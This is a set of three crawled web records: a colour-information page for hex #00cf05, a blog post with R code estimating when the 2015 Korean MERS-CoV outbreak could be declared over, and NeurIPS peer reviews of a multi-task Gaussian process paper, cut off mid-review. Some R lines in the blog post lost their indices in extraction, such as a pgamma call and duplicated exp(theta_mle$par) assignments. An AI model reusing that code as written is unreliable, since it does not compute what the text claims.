https://www.colorhexa.com/00cf05
[ "# #00cf05 Color Information\n\nIn a RGB color space, hex #00cf05 is composed of 0% red, 81.2% green and 2% blue. Whereas in a CMYK color space, it is composed of 100% cyan, 0% magenta, 97.6% yellow and 18.8% black. It has a hue angle of 121.4 degrees, a saturation of 100% and a lightness of 40.6%. #00cf05 color hex could be obtained by blending #00ff0a with #009f00. Closest websafe color is: #00cc00.\n\n• R 0\n• G 81\n• B 2\nRGB color chart\n• C 100\n• M 0\n• Y 98\n• K 19\nCMYK color chart\n\n#00cf05 color description : Strong lime green.\n\n# #00cf05 Color Conversion\n\nThe hexadecimal color #00cf05 has RGB values of R:0, G:207, B:5 and CMYK values of C:1, M:0, Y:0.98, K:0.19. Its decimal value is 52997.\n\nHex triplet RGB Decimal 00cf05 `#00cf05` 0, 207, 5 `rgb(0,207,5)` 0, 81.2, 2 `rgb(0%,81.2%,2%)` 100, 0, 98, 19 121.4°, 100, 40.6 `hsl(121.4,100%,40.6%)` 121.4°, 100, 81.2 00cc00 `#00cc00`\nCIE-LAB 72.65, -73.55, 70.565 22.339, 44.634, 7.581 0.3, 0.599, 44.634 72.65, 101.927, 136.186 72.65, -68.752, 88.599 66.809, -57.23, 40.038 00000000, 11001111, 00000101\n\n# Color Schemes with #00cf05\n\n• #00cf05\n``#00cf05` `rgb(0,207,5)``\n• #cf00ca\n``#cf00ca` `rgb(207,0,202)``\nComplementary Color\n• #62cf00\n``#62cf00` `rgb(98,207,0)``\n• #00cf05\n``#00cf05` `rgb(0,207,5)``\n• #00cf6d\n``#00cf6d` `rgb(0,207,109)``\nAnalogous Color\n• #cf0062\n``#cf0062` `rgb(207,0,98)``\n• #00cf05\n``#00cf05` `rgb(0,207,5)``\n• #6d00cf\n``#6d00cf` `rgb(109,0,207)``\nSplit Complementary Color\n• #cf0500\n``#cf0500` `rgb(207,5,0)``\n• #00cf05\n``#00cf05` `rgb(0,207,5)``\n• #0500cf\n``#0500cf` `rgb(5,0,207)``\n• #cacf00\n``#cacf00` `rgb(202,207,0)``\n• #00cf05\n``#00cf05` `rgb(0,207,5)``\n• #0500cf\n``#0500cf` `rgb(5,0,207)``\n• #cf00ca\n``#cf00ca` `rgb(207,0,202)``\n• #008303\n``#008303` `rgb(0,131,3)``\n• #009c04\n``#009c04` `rgb(0,156,4)``\n• #00b604\n``#00b604` `rgb(0,182,4)``\n• #00cf05\n``#00cf05` `rgb(0,207,5)``\n• #00e906\n``#00e906` `rgb(0,233,6)``\n• #03ff09\n``#03ff09` `rgb(3,255,9)``\n• #1dff22\n``#1dff22` `rgb(29,255,34)``\nMonochromatic Color\n\n# Alternatives to #00cf05\n\nBelow, you can see some colors close to #00cf05. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #2fcf00\n``#2fcf00` `rgb(47,207,0)``\n• #1ecf00\n``#1ecf00` `rgb(30,207,0)``\n• #0ccf00\n``#0ccf00` `rgb(12,207,0)``\n• #00cf05\n``#00cf05` `rgb(0,207,5)``\n• #00cf16\n``#00cf16` `rgb(0,207,22)``\n• #00cf28\n``#00cf28` `rgb(0,207,40)``\n• #00cf39\n``#00cf39` `rgb(0,207,57)``\nSimilar Colors\n\n# #00cf05 Preview\n\nThis text has a font color of #00cf05.\n\n``<span style=\"color:#00cf05;\">Text here</span>``\n#00cf05 background color\n\nThis paragraph has a background color of #00cf05.\n\n``<p style=\"background-color:#00cf05;\">Content here</p>``\n#00cf05 border color\n\nThis element has a border color of #00cf05.\n\n``<div style=\"border:1px solid #00cf05;\">Content here</div>``\nCSS codes\n``.text {color:#00cf05;}``\n``.background {background-color:#00cf05;}``\n``.border {border:1px solid #00cf05;}``\n\n# Shades and Tints of #00cf05\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #000b00 is the darkest color, while #f6fff6 is the lightest one.\n\n• #000b00\n``#000b00` `rgb(0,11,0)``\n• #001e01\n``#001e01` `rgb(0,30,1)``\n• #003201\n``#003201` `rgb(0,50,1)``\n• #004602\n``#004602` `rgb(0,70,2)``\n• #005902\n``#005902` `rgb(0,89,2)``\n• #006d03\n``#006d03` `rgb(0,109,3)``\n• #008103\n``#008103` `rgb(0,129,3)``\n• #009404\n``#009404` `rgb(0,148,4)``\n• #00a804\n``#00a804` `rgb(0,168,4)``\n• #00bb05\n``#00bb05` `rgb(0,187,5)``\n• #00cf05\n``#00cf05` `rgb(0,207,5)``\n• #00e305\n``#00e305` `rgb(0,227,5)``\n• #00f606\n``#00f606` `rgb(0,246,6)``\n• #0bff11\n``#0bff11` `rgb(11,255,17)``\n• #1eff24\n``#1eff24` `rgb(30,255,36)``\n• #32ff37\n``#32ff37` `rgb(50,255,55)``\n• #46ff4a\n``#46ff4a` `rgb(70,255,74)``\n• #59ff5d\n``#59ff5d` `rgb(89,255,93)``\n• #6dff70\n``#6dff70` `rgb(109,255,112)``\n• #81ff84\n``#81ff84` `rgb(129,255,132)``\n• #94ff97\n``#94ff97` `rgb(148,255,151)``\n• #a8ffaa\n``#a8ffaa` `rgb(168,255,170)``\n• #bbffbd\n``#bbffbd` `rgb(187,255,189)``\n• #cfffd0\n``#cfffd0` `rgb(207,255,208)``\n• #e3ffe3\n``#e3ffe3` `rgb(227,255,227)``\n• #f6fff6\n``#f6fff6` `rgb(246,255,246)``\nTint Color Variation\n\n# Tones of #00cf05\n\nA tone is produced by adding gray to any pure hue. In this case, #606f60 is the less saturated color, while #00cf05 is the most saturated one.\n\n• #606f60\n``#606f60` `rgb(96,111,96)``\n• #587758\n``#587758` `rgb(88,119,88)``\n• #507f51\n``#507f51` `rgb(80,127,81)``\n• #488749\n``#488749` `rgb(72,135,73)``\n• #408f42\n``#408f42` `rgb(64,143,66)``\n• #38973a\n``#38973a` `rgb(56,151,58)``\n• #309f32\n``#309f32` `rgb(48,159,50)``\n• #28a72b\n``#28a72b` `rgb(40,167,43)``\n• #20af23\n``#20af23` `rgb(32,175,35)``\n• #18b71c\n``#18b71c` `rgb(24,183,28)``\n• #10bf14\n``#10bf14` `rgb(16,191,20)``\n• #08c70d\n``#08c70d` `rgb(8,199,13)``\n• #00cf05\n``#00cf05` `rgb(0,207,5)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #00cf05 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5216041,"math_prob":0.8516218,"size":3628,"snap":"2019-51-2020-05","text_gpt3_token_len":1574,"char_repetition_ratio":0.13548565,"word_repetition_ratio":0.011090573,"special_character_ratio":0.5548512,"punctuation_ratio":0.23068182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.988366,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-18T00:56:03Z\",\"WARC-Record-ID\":\"<urn:uuid:128f7241-03b5-43e2-98de-9966618b7d43>\",\"Content-Length\":\"36166\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:10f8fdc5-3c7c-4e49-b0dd-2644eecf557f>\",\"WARC-Concurrent-To\":\"<urn:uuid:c491e3a7-d9f7-48f0-91e9-8bc8e5f8646c>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/00cf05\",\"WARC-Payload-Digest\":\"sha1:FU5VLQAZKF6DVHP3MANPRKDK52MEECFU\",\"WARC-Block-Digest\":\"sha1:CSQ3ABLXZRHEH5L2KGRYEHCJCS7EXNDO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250591431.4_warc_CC-MAIN-20200117234621-20200118022621-00322.warc.gz\"}"}
https://staff.math.su.se/hoehle/blog/2016/08/04/outbreakEnd.html
[ "## Abstract\n\nR code is provided for implementing a statistical method by Nishiura, Miyamatsu, and Mizumoto (2016) to assess when to declare the end of an outbreak of a person-to-person transmitted disease. The motivating example is the MERS-CoV outbreak in Korea, 2015. From a greater perspective, the blog entry is an attempt to advocate for spicing up statistical conferences by a reproducibility session.", null, "This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. The markdown+Rknitr source code of this blog is available under a GNU General Public License (GPL v3) license from github.\n\n# Introduction\n\nA few weeks ago I went to the International Biometric Conference (IBC) in Victoria. Conferences are good for meeting people, but with respect to scientific content, there is typically no more than 2-3 talks in a week, which you really remember. Partly, this is due to the format of statistics conferences not developing much in recent decades: it is plenary talks, invited sessions, contributed sessions, showcase sessions and poster sessions all over. However, some developments have occurred, e.g.\n\n• the German joint statistical meeting introduced the concept of a stats bazaar talk.\n• the R User Conference has added some interesting additional formats, e.g. lightning talks, in order to make life at a conference more interesting. Thomas Leeper has written an inspiring blog post about this issue.\n\nNot all science is ‘fun’, but when balancing between adding yet-another-table-from-a-simulation-study against 95% of the audience dozing off, I urge you to aim for an awake audience.\n\nSo here is an additional session format in the spirit of reproducible science, which might help make statistics conference more alive again: Take the contents of a talk, find the corresponding paper/technical report/slides, download the data (of course these are available) and start implementing. After all, hacking a statistical method is the best way to understand it and reproducing the results of an analysis is a form of peer-review we should do much more as statisticians. The important talk by Keith A. Baggerly about reproducibility in bioinformatics more than underlines this.\n\nAs a consequence, this blog entry is my attempt of a repro-session in connection with the IBC: The talk entitled Determining the end of an epidemic with human-to-human transmission by Hiroshi Nishiura was both interesting, from a field I’m interested in (infectious disease epidemiology) and the method looked like it could be re-implemented in finite time. The question the method tries to answer is the following: at which time point can one declare an outbreak of a person-to-person transmitted disease as having ended? Answering this question can be important in order to calm the population, attract tourists again, export goods or reduce alertness status. The current WHO method for answering the question requires that a period of two times the longest possible incubation time needs to have passed since the last cases before an outbreak can be declared as being over. However, as stated in their paper (Nishiura, Miyamatsu, and Mizumoto (2016)), the criterion clearly lacks a statistical motivation. As an improvement Nishiura and co-workers formulate a statistical criterion based on the serial interval distribution and the offspring distribution.\n\nIn what follows we shall quickly describe their method and apply it to their motivating example, which was the 2015 MERS-CoV outbreak in Korea. As a small outlook, we shall implement some own thoughts on how to answer the posed questions using a hierarchical model.\n\n# Method\n\nLet $$Y_t$$ be a count variable representing the number of symptom onset in cases we observe on a given day $$t$$ during the outbreak. The sequence of the $$Y_t$$ is also called the epidemic cuve of the outbreak. Furthermore, let $$D=\\{t_i; i=1,\\ldots,n\\}$$, be the currently available outbreak data containing the time of symptom onset in in each of the $$n$$ cases of the outbreak. In what follows we will be interested in what happens with $$Y_t$$ for future time points, i.e. time points after the last currently observed onset time. In particular we will be interested in, whether we will observe zero cases or more than zero cases.\n\nThe important result of Nishiura, Miyamatsu, and Mizumoto (2016) is that the probability $$\\pi_t = P(Y_t > 0\\>|\\>D)$$ can be computed as follows: \\begin{align*} \\pi_t = 1 - \\prod_{i=1}^n \\sum_{o=0}^{\\infty} f_{\\text{offspring}}(o; R_0, k) \\cdot \\left[ F_{\\text{serial}}(t-t_i) \\right]^{o}, \\end{align*} where $$f_{\\text{offspring}}$$ denotes the PMF for the number of secondary cases one primary case induces. It is assumed that this distribution is negative binomial with expectation $$R_0>0$$ and clumping parameter $$k>0$$. In other words, $$\\operatorname{E}(O)=R_0$$ and $$\\operatorname{Var}(O)=R_0 + R_0^2/k$$. Furthermore, $$F_{\\text{serial}}$$ denotes the CDF of the serial interval distribution of the disease of interest. The serial interval is the time period between the onset of symptoms in the primary and onset of symptoms in the secondary case, see Svensson (2007).\n\nOnce $$\\pi_t$$ is below some pre-defined threshold $$c$$, say $$c=0.05$$, one would declare the outbreak to be over, if no new cases have been observed by time $$t$$. In other words: $T_{\\text{end}} = \\min_{t>t^*} \\{ \\pi_t < c \\}.$ where $$t^* = \\max_{i=1,\\ldots,n} t_i$$, i.e. the onset time in the last observed case.\n\nNote that the formulated approach is conservative, because every available case is treated as having the potential to generate new secondary cases according to the entire offspring distribution. In practice, however, observed cases towards the end will be secondary cases of some of the earlier cases. Hence, these primary cases will be attributed as having the ability to generate more secondary cases than they actually have in practice. Another important assumption of the method is that all cases are observed: no asymptomatic cases nor under-reporting is taken into account.\n\n## Data from the MERS-Cov Oubtreak in Korea, 2015\n\nThe data basis for our analysis is the WHO data set on the MERS-Cov outbreak in Korea, which occurred during May-July 2015. It contains the information about 185 cases of the MERS-CoV outbreak in Korea, 2015. These were already analysed in a previous blog entry for the purpose of nowcasting. However, we shall now be interested in answering the following question: Given the observations of symptoms on the last (known) case on 2015-07-02. How many days without new infections would have to pass, before we would declare the outbreak as having ended?\n\n## Results\n\nIn what follows we shall distinguish results between model parameters to be estimated from data and the computation of the probability $$\\pi_t$$. Focus of this blog entry is on the later part. Details on the first part is available in the code.\n\n## Parameter Estimation\n\nThe parameters to estimate are the following:\n\n• parameters of the parametric distributional family governing the serial interval distribution (in Nishiura, Miyamatsu, and Mizumoto (2016) this is assumed to be a gamma distribution)\n• parameters of the offspring distribution, which here is assumed to be negative binomial with mean $$R_0$$ and clumping parameter $$k$$\n\nThe first step is easily accomplished in Nishiura et al. (2015) by solving for given mean and standard deviation for the serial interval distribution observed in secondary data - see the paper for details. The solution can be found analytically given the values.\n\nE <- 12.6\nSD <- 2.8\n(theta_serial <- c(E^2/SD^2,E/SD^2))\n## 20.25 1.61\n\nThe second part is addressed in Nishiura et al. (2015) by analysing final-size and generation data using a maximum likelihood approach. We will here only implement the methods using the data presented in Figure 1 and Table 1 of the paper. Unfortunately, one cluster size is not immediately reconstructable from the data in the paper, but guesstimating from the table on p.4 of the ECDC Rapid Risk Assessment it appears to be the outbreak in Jordan with a size of 19. The likelihood is then maximized for $$\\mathbf{\\theta}=(\\log(R_0),\\log(k))'$$ using optim. Based on the Hessian, a numeric approximation of the variance-covariance matrix of $$\\hat{\\mathbf{\\theta}}$$ can be obtained.\n\nAltogether, we maximize the combined likelihood consisting of 36 as well as the corresponding number of generations by:\n\ntheta_mle <- optim(c(log(1),log(1)),ll_combine, outbreaks=outbreaks, control=list(fnscale=-1),hessian=TRUE)\nexp(theta_mle$par) ## 0.826 0.128 These numbers deviate slightly from the values of $$\\hat{R}_0=0.75$$ and $$\\hat{k}=0.14$$ reported by Nishiura et al. (2015). One explanation might be the unclear cluster size of the Jordan outbreak, here it would have been helpful to have had all data directly available in electronic form. ## Outbreak End The above $$\\pi_t$$ equation is implemented below as function p_oneormore. It requires the use of the PMF of the offspring distribution (doffspring), which here is the negative binomial offspring distribution. ##Offspring distribution, this is just the negative binomial PMF. doffspring <- function(y, R_0, k, log=FALSE) { dnbinom(y, mu=R_0, size=k, log=log) } ##Probability for one or more cases at time t. p_oneormore <- Vectorize(function(t,R_0,k,theta_serial,yMax=1e4,verbose=FALSE) { if (verbose) cat(paste0(t,\"\\n\")) res <- 1 ##Loop over all cases as in eqn (1) of the suppl. of Nishiura (2016). ##Setup process bar for this action. if (verbose) { pb <- startpb(1, nrow(linelist)) on.exit(closepb(pb)) } for (i in seq_len(nrow(linelist))) { if (verbose) { setpb(pb, i) } serial_time <- as.numeric(t - linelist$Date.of.symptoms.onset[i])\ncdf <- pgamma(serial_time, theta_serial, theta_serial)\ny <- 0L:yMax\nysum <- sum( doffspring(y=y,R_0=R_0,k=k)*cdf^y)\nres <- res * ysum\n}\nreturn(1-res)\n},vectorize.args=c(\"t\",\"R_0\",\"k\"))\n\nThe function allows us to re-calculate the results of Nishiura, Miyamatsu, and Mizumoto (2016):\n\n##Results from the Nishiura et al. (2015) paper\n##R_0_hat <- 0.75 ; k_hat <- 0.14\n##Use MLE found with the data we were able to extract.\nR_0_hat <- exp(theta_mle$par) k_hat <- exp(theta_mle$par)\n\n## Compute prob for one or more cases on a grid of dates\ndf <- data_frame(t=seq(as.Date(\"2015-07-15\"),as.Date(\"2015-08-05\"),by=\"1 day\"))\ndf <- df %>% mutate(pi = p_oneormore(t,R_0=R_0_hat, k=k_hat, theta_serial=theta_serial, yMax=250,verbose=FALSE))\nhead(df, n=3)\n## Source: local data frame [3 x 2]\n##\n## t pi\n## (date) (dbl)\n## 1 2015-07-15 0.366\n## 2 2015-07-16 0.297\n## 3 2015-07-17 0.226\n\nWe can embed estimation uncertainty originating from the estimation of $$R_0$$ and $$k$$ by adding an additional bootstrap step with values of $$(\\log R_0, \\log k)'$$ sampled from the asymptotic normal distribution. This distribution has expectation equal to the MLE and variance-covariance matrix equal to the observed Fisher information. Pointwise percentile-based 95% confidence intervals are then easily computed. The figure below shows this 95% CI (shaded area) together with the $$\\pi_t$$ curve.", null, "Altogether, the date where we would declare the outbreak to be over is found as:\n\nc_threshold <- 0.05\n(tEnd <- df2 %>% filter(quantile.97.5% < c_threshold) %>% slice(1L))\n## # A tibble: 1 x 4\n## t pi quantile.2.5% quantile.97.5%\n## <date> <dbl> <dbl> <dbl>\n## 1 2015-07-21 0.0345 0.0253 0.0454\n\nIn other words, given the assumptions of the model and the chosen threshold, we would declare the outbreak to be over, if no new cases are observed by 2015-07-21. The adequate choice of $$c$$ as cut-off in the procedure in general depends on what is at stake. Hence, choosing $$c=0.05$$ without additional thought is more than arbitrary, but a more careful discussion is beyond the scope of this blog note.\n\n## Hierarchical model\n\nCommenting on the derivations done in Nishiura, Miyamatsu, and Mizumoto (2016) from a Bayesian viewpoint, it appears more natural to formulate the model directly in hierarchical terms:\n\n\\begin{align*} N_i &\\sim \\operatorname{NegBin}(R_0,k), & i&=1,\\ldots,n,\\\\ \\mathbf{O}_i\\>|\\>N_i &\\sim \\operatorname{M}(N_i,\\mathbf{p}_{\\text{serial}}),& i&=1,\\ldots,n,\\\\ Y_t\\>|\\> \\mathbf{O} &= \\sum_{i=1}^n O_{i,t_i-t}, & t&=t^*+1,t^*+2,\\ldots,\\\\ \\end{align*} where $$\\mathbf{p}_{\\text{serial}}$$ is the PMF of the discretized serial interval distribution for exampling obtained by computing $$p_{y} = F_{\\text{serial}}(y) - F_{\\text{serial}}(y-1)$$ for $$0<y\\leq S$$, where $$S$$ is the largest possible/relevant serial interval to consider, and letting $$p_{0} = 0$$. Furthermore, $$O_{i,t_i-t}=0$$ if $$t_i-t<0$$ or $$t_i-t>S$$ and corresponds to the value obtained from $$M(N_i,\\mathbf{p}_{\\text{serial}})$$ otherwise. Finally, $$\\mathbf{O}=(\\mathbf{O}_1,\\ldots,\\mathbf{O}_n)$$.\n\nGiven $$R_0$$ and $$k$$ it is easy to use Monte Carlo simulation to obtain instances of $$Y_t$$ for a selected time-range from the above model. The code for this function simulation is available as part of this R-markdown document (again, see the underlying source on the github repository for details). Similarly to the previous model the hierarchical model is also slightly conservative, because it does not take existing secondary cases in the data into account and samples $$N_i$$ new secondary cases for each observed case.\n\nSince we for this model will be using simulations it is easy to modify the criterion for fade-out slightly to the more natural probability $$\\pi_t^*$$ that no case at $$t$$ nor beyond $$t$$ will occur, i.e. $\\pi_t^* = P\\left( \\bigwedge_{i=t}^\\infty \\{Y_t = 0\\} \\right).$\n\nWe perform a study with 10000 different simulations each evaluated on a grid from 2015-07-03 to 2015-07-27. The resulting values are stored in the $$25 \\times 10000$$ matrix Y from which we can compute:\n\npi <- apply(Y,1,mean)\npi[pi < c_threshold]\n## 2015-07-21 2015-07-22 2015-07-23 2015-07-24 2015-07-25 2015-07-26 2015-07-27\n## 0.0341 0.0197 0.0095 0.0037 0.0021 0.0013 0.0004\n##Better way to calc extinction prob.\npi_star <- rev(apply(apply(Y,2,function(x) cumsum(rev(x))>0),1,mean))\npi_star[pi_star < c_threshold]\n## 2015-07-22 2015-07-23 2015-07-24 2015-07-25 2015-07-26 2015-07-27\n## 0.0343 0.0168 0.0075 0.0038 0.0017 0.0004\n\nWe note that the result, when using $$\\pi_t^*$$ instead of $$\\pi_t$$, leads to the outbreak being declared over one day later. Additional uncertainty handling is performed as before by obtaining bootstrap samples for $$(\\log R_0, \\log k)'$$ from the asymptotic normal distribution. For each such sample the above Monte Carlo procedure is executed allowing us to determine point-wise confidence intervals for the probability by the percentile method.", null, "# Discussion\n\nThe present note introduced the statistical model based approach of Nishiura, Miyamatsu, and Mizumoto (2016) for declaring the end of a person-to-person transmitted disease outbreak such as MERS-Cov, Ebola, etc. If the considered outbreak has a different mode of transmission, e.g. foodborne or originates from a point-source, then different formulas apply, see e.g. Brookmeyer and You (2006). Interestingly enough, there appears to be some methodological overlap between declaring the end of an outbreak and declaring a software product to be free of errors.\n\nTo summarise: The results of the Nishiura, Miyamatsu, and Mizumoto (2016) paper could - with some fiddling to guesstimate the data - be approximately reproduced. A hierarchical model with simulation based inference was able to produce similar results. Availability of the full data in electronic form would have been helpful. Altoghether, it was fun to implement the method and hope is that the avaibility of the present analysis and R code might be helpful to someone at some point. You are certainly invited to reprofy the present analysis.", null, "" ]
[ null, "https://i.creativecommons.org/l/by-sa/4.0/88x31.png", null, "https://staff.math.su.se/hoehle/blog/figure/source/2016-08-04-outbreakEnd/unnamed-chunk-8-1.png", null, "http://staff.math.su.se/hoehle/blog/figure/source/2016-08-04-outbreakEnd/Y_UNCERTAINTY-1.png", null, "https://openclipart.org/image/300px/svg_to_png/169987/copy.png&disposition=attachment", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86778814,"math_prob":0.9806574,"size":16553,"snap":"2020-24-2020-29","text_gpt3_token_len":4402,"char_repetition_ratio":0.108224064,"word_repetition_ratio":0.023712182,"special_character_ratio":0.27928472,"punctuation_ratio":0.12818097,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.996143,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-06-05T16:33:27Z\",\"WARC-Record-ID\":\"<urn:uuid:fef87a3a-f290-4637-a253-3b03190eccba>\",\"Content-Length\":\"36948\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d4087166-231c-473a-acf9-ca63f0a6f23a>\",\"WARC-Concurrent-To\":\"<urn:uuid:a79eaeab-5aac-495d-8d4b-df23da843c3b>\",\"WARC-IP-Address\":\"195.74.38.67\",\"WARC-Target-URI\":\"https://staff.math.su.se/hoehle/blog/2016/08/04/outbreakEnd.html\",\"WARC-Payload-Digest\":\"sha1:FISHA7TIUYCOASFNMARSCI4MK5E6BMKX\",\"WARC-Block-Digest\":\"sha1:KKVZ2Z53P3XPOA44FOHDWNH2SB3LT3P2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590348502097.77_warc_CC-MAIN-20200605143036-20200605173036-00085.warc.gz\"}"}
https://proceedings.neurips.cc/paper_files/paper/2013/file/59c33016884a62116be975a9bb8257e3-Reviews.html
[ " Export Reviews, Discussions, Author Feedback and Meta-Reviews\n\n Paper ID: 731 Title: It is all in the noise: Efficient multi-task Gaussian process inference with structured residuals\nReviews\n\nSubmitted by Assigned_Reviewer_1\n\nQ1: Comments to author(s). First provide a summary of the paper, and then address the following criteria: Quality, clarity, originality and significance. (For detailed reviewing guidelines, see http://nips.cc/PaperInformation/ReviewerInstructions)\nUpdate after reading the authors' rebuttal:\n\nVery good paper but I strongly recommend the authors to consider all the suggestions below that will improve the readability of the paper.\n\n=====\n\n1. Summary:\n\nThis paper presents a multi-task Gaussian process regression approach where the covariance of the main process (signal) decomposes as a product of a covariance between tasks and a covariance between inputs (sample covariance). It is assumed that all the training outputs are observed at all inputs, which leads to a Kronecker product covariance.\n\nNoisy observations are modeled via a structured process and this is the main contribution of the paper. While previous work on multi-task GP approaches with Kronecker covariances has considered iid noise in order to carry out efficient computations, this paper shows that it is possible to consider a noise process with Kronecker structure, while maintaining efficient computations. In other words, as in the iid noise case, one never has to compute a Kronecker product and hence computations are O(N^3 + T^3) instead of O(N^3T^3). This is achieved by whitening the noise process and projecting the (noiseless) covariance of the system into the eigen-basis of the noise covariance (scaled by the eigenvalues).\n\nTheir experiments show that the proposed structured-noise multi-task GP approach outperforms the baseline iid-noise multi-task GP method and independent GPs on synthetic data and real applications.\n\n2. Quality\n\nThe paper seems technically sound once one realizes how to fix the notational inconsistencies between section 2 and section 3 (please see item 4 below regarding Clarity). The main claim that one can have structured noise in multi-task GP models with product covariances while still maintaining computational efficiency (compared to the naive approach) is well supported with the mathematical derivations in section 3 and with the experimental results in section 4.\n\nWith respect to the results, although it is obvious that the naive approach would be much worse in terms of computation compared to the efficient approach, it is still helpful to see the comparison in Figure 1 so one can take into consideration the possible overhead in implementing the GP-KS method. However, there are a few deficiencies that need to be pointed out:\n\n(a) There is a rank-1 parameterization of C and \\Sigma. However, it is unclear how the parameter \\sigma in line 246 was set. This parameter is important as it allows that the algorithm can actually run but also that one does not over-smooth the process leading to poor generalization performance.\n\n(b) It is completely unclear what \\Omega is actually used (please see Clarity below). This should be explicitly said in the experiments. From section 2, it can be inferred that \\Omega = I_{NN}. But the reader should not be guessing about something that must be explicit.\n\n(c) Line 328: \"Large-scale prediction ..\" : 123 tasks and 218 samples are very far from what can be considered as large-scale.\n\n(d) In the experiments regarding the prediction of gene expression in yeast, it looks like the preprocessing and filtering of the dataset does favor the proposed method (which may have problems with identifiability) as genes with low signal and low noise are discarded. The authors should provide comments on this.\n\n(e) The authors have not analyzed possible weaknesses of their method. In particular, interpreting the results in Figure 3 is a bit misleading as it seems that their method has high levels of unidentifiability. Why is it possible to interpret the results? There may be completely different qualitative solutions that lead to similar quantitative performance. Is identifiability an issue during optimization?\n\n(f) Multi-task settings usually compare to a single GP for all tasks (i.e. pool GP). This baseline is missing.\n\n3. Clarity\n\nIn terms of language use, the paper is relatively well written. However, there are quite a few notational inconsistencies that may push this paper below the threshold. For example:\n\n(a) The same symbol (k) in Equation 1 is used for both covariance (sample and task) functions and this is completely inconsistent with the following notation in the paper (C, R). On the same equation, is this really the covariance between the noisy outputs y or should it be between their corresponding noiseless latent functions?\n\n(b) Sometimes C_{TT}, R_{NN}, etc are used and other times C, T, are used\n\n(c) This is inconsistency is crucial to understand the paper: I_{NN} is used in Equation 3 but then\n\\Omega is introduced in section 3 without explaining what it refers to. Is \\Omega = I_{NN}?\n\n(d) K is undefined before being used in Equation 6\n\n(e) Equation 9 does not make sense. It goes from a vector on the line above to a matrix. Is there a Vec operator missing?\n\n4. Originality\n\nThe approach to multi-task GP regression differs from most previous work in the way the noise process is modeled (structured noise compared to idd noise) while maintaining efficiency during inference. These types of processes have been considered before for example by Zhang (2007) but efficient computations were not explicitly done when considering the specific case of two processes.\n\nWithout committing to a specific approach for flexible multi-task models, it seems necessary to at least mention how this works compare to the Gaussian process regression network framework in .\n\nAdditionally, sec 2.2 is obvious and should be omitted. The case C = \\Sigma leads to C \\otimes (R+I), which is the same proof shown in previous work .\n\n5. Significance\n\nThe contribution of this paper is relatively significant in that it shows that it is possible to do efficient computation in these types of models when a sum of two Kronecker products is present. This can be exploited in scenarios different to the regression setting. However, in terms of the original motivation, i.e. multi-task regression, there are other more flexible models for which inference is still better than the naive approach (N^3 T^3).\n\n(a) Abstract, lines 18-20: This is not true.\n\nReferences:\n\nHao Zhang. Maximum-likelihood estimation for multivariate spatial linear coregionalization models. Environmetrics, 18(2):125–139, 2007\nThis paper presents a novel approach to multi-task GP regression where the noise process is structured. It shows that inference can be carried out more efficiently compared to the naive approach. The experimental results show the proposed approach is better than previous work that used iid noise. Quite a few notational problems need to be fixed if this paper is to be published.\n\nSubmitted by Assigned_Reviewer_2\n\nQ1: Comments to author(s). First provide a summary of the paper, and then address the following criteria: Quality, clarity, originality and significance. (For detailed reviewing guidelines, see http://nips.cc/PaperInformation/ReviewerInstructions)\nOverview\n==\nThe method proposes a sum of kronecker kernels for GP regression. The idea is that one kernel represents signal (ie. is dependent on the inputs), and the other represents some structured noise. An efficient inference scheme is derived, and some convincing experiments o statistical genetics are presented.\n\nA strong paper with a clear flow. Some details could be clarified, and there is some slopiness in the notation, but this could easily be overcome in the rebuttal stage.\n\nIntroduction\n--\nA neat introduction. I like the approach through Bonilla and Williams' result. I wonder if you could expand this slightly: why does the prediction reduce to independent models?\n\nSection 2\n--\n\nminor quibble: definition of vec Y is a little sloppy. consider using\n\\vec {\\mathbf Y} = (y_1^\\top \\ldots y_T^\\top)^\\top\n\nline 124: This is the same as a GPLVM with a _linear kernel_. I think this is going to confuse some readers, suggest you either expand or omit.\n\nline 136: Y*_{n,t} = ... this is not Y*, but the mean prediction of Y*. perhaps you should denote it M*_{n,t}?\n\neq. (5). I like this derivation, but it took me a little while to follow ( I had to look up the rules for kroneker multiplication). Perhaps you could expand some of the steps in an appendix?\n\nSection 3\n--\nThis is the heart of the paper, and the main contribution I feel. But you've not introduced \\Omega!\n\nIt would be good to know why K_tilde is easier to deal with than K. Is it smaller (fewer eigenvalues) or is the Kronecker of the identity easy to deal with?\n\nSection 4\n==\nThe simulation section is great. It's clear that your proposed method is working well.\n\nminor quibble: line 269 -- I'm not sure that drastic is the correct term! Perhaps 'dramatic', or 'significant'.\n\nline 360. Your discussion isn't so clear to me. I can see that your model worked in some sense, in that the recovered noise covariance has structure, and clearly it's hard to come up with concrete validation with out a gold standard, but it's not clear what you're demonstrating. How are the conditions organised in the covariance matrices of fig 3? I guess one condition is the first block of the matrix, and the other condition is the next block? More explanation required, please.\n\nPros\n==\n- A 